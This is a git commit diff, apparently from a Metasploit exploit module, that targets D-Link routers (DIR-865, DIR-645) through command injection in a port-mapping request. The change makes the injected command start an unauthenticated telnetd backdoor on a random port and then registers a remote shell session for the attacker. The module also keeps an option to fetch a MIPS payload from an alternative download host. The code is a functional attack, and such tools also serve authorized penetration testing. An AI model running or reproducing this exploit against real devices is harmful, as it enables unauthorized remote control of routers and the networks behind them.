session now working
m-1-k-3
parent
9133dbac4a
commit
47ca4fd48f
|
|
@ -58,13 +58,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'unix'
|
||||
}
|
||||
],
|
||||
[ 'Telnet', #all devices
|
||||
[ 'Telnet', #all devices, use a netcat bind payload for getting a valid session
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => 'unix'
|
||||
}
|
||||
],
|
||||
[ 'Linux mipsel Payload', #DIR-865, DIR-645
|
||||
[ 'Linux mipsel Payload', #DIR-865, DIR-645, and some more
|
||||
{
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'Platform' => 'linux'
|
||||
|
|
@ -80,8 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
|
||||
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
|
||||
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
|
||||
OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
|
||||
OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
|
||||
#OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
|
||||
#OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
@ -144,6 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
handler
|
||||
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
|
||||
|
||||
new_portmapping_description = rand_text_alpha(8)
|
||||
|
|
@ -170,15 +171,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
if target.name =~ /Telnet/
|
||||
passw = datastore['TELNETPASS'] || rand_text_alpha(8)
|
||||
user = datastore['TELNETUSER'] || rand_text_alpha(4)
|
||||
#passw = datastore['TELNETPASS'] || rand_text_alpha(8)
|
||||
#user = datastore['TELNETUSER'] || rand_text_alpha(4)
|
||||
telnetport = rand(65535)
|
||||
|
||||
vprint_status("#{rhost}:#{rport} - User: #{user}")
|
||||
vprint_status("#{rhost}:#{rport} - Password: #{passw}")
|
||||
#vprint_status("#{rhost}:#{rport} - User: #{user}")
|
||||
#vprint_status("#{rhost}:#{rport} - Password: #{passw}")
|
||||
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
|
||||
|
||||
cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
|
||||
#cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
|
||||
cmd = "telnetd -p #{telnetport}" # -l \"/usr/sbin/login\" -u #{user}:#{passw}"
|
||||
type = "add"
|
||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
||||
if (!res or res.code != 200)
|
||||
|
|
@ -199,13 +201,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
|
||||
end
|
||||
|
||||
print_status "Attempting to start a Telnet session #{rhost}:#{telnetport} with #{user}:#{passw}"
|
||||
print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" # with #{user}:#{passw}"
|
||||
auth_info = {
|
||||
:host => rhost,
|
||||
:port => telnetport,
|
||||
:sname => 'telnet',
|
||||
:user => user,
|
||||
:pass => passw,
|
||||
#:user => user,
|
||||
#:pass => passw,
|
||||
:source_type => "exploit",
|
||||
:active => true
|
||||
}
|
||||
|
|
@ -214,13 +216,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'USERPASS_FILE' => nil,
|
||||
'USER_FILE' => nil,
|
||||
'PASS_FILE' => nil,
|
||||
'USERNAME' => user,
|
||||
'PASSWORD' => passw
|
||||
#'USERNAME' => user,
|
||||
#'PASSWORD' => passw
|
||||
}
|
||||
# NOT WORKING
|
||||
conn = Net::SSH::CommandStream.new(sock, '/bin/sh', true)
|
||||
#puts conn.methods.to_s
|
||||
start_session(self, "TELNET #{user}:#{passw} (#{rhost}:#{telnetport})", merge_me, false, conn.lsock)
|
||||
#taken from ./lib/msf/core/auxiliary/commandshell.rb
|
||||
info = "TELNET (#{rhost}:#{telnetport})"
|
||||
sess = Msf::Sessions::CommandShell.new(sock)
|
||||
sess.set_from_exploit(self)
|
||||
sess.info = info
|
||||
|
||||
# Clean up the stored data
|
||||
sess.exploit_datastore.merge!(merge_me)
|
||||
|
||||
# Prevent the socket from being closed
|
||||
self.sockets.delete(sock)
|
||||
self.sock = nil if self.respond_to? :sock
|
||||
|
||||
framework.sessions.register(sess)
|
||||
sess.process_autoruns(datastore)
|
||||
|
||||
sess
|
||||
rescue
|
||||
print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue